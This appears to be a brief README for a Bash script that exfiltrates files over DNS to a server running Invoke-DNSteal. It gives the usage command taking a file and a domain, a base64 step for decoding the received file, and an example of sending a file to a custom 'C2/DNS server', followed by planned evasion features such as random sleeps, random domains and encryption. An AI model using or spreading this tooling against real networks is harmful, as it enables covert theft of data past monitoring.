Bash script for DNS file exfiltration using Invoke-DNSteal in server side.
- Run Invoke-DNSteal.py in your DNS server
- Use:
./adet.sh <file> <domain>
- Decode the received file in base64
base64 -d <received_file>
Example: Sending byp4xx.py to my own customized C2/DNS server
- Add random sleep option
- Add random domain when DNS server is specified
- Add byte length option
- Add TCP option
- Add encryption? Why not?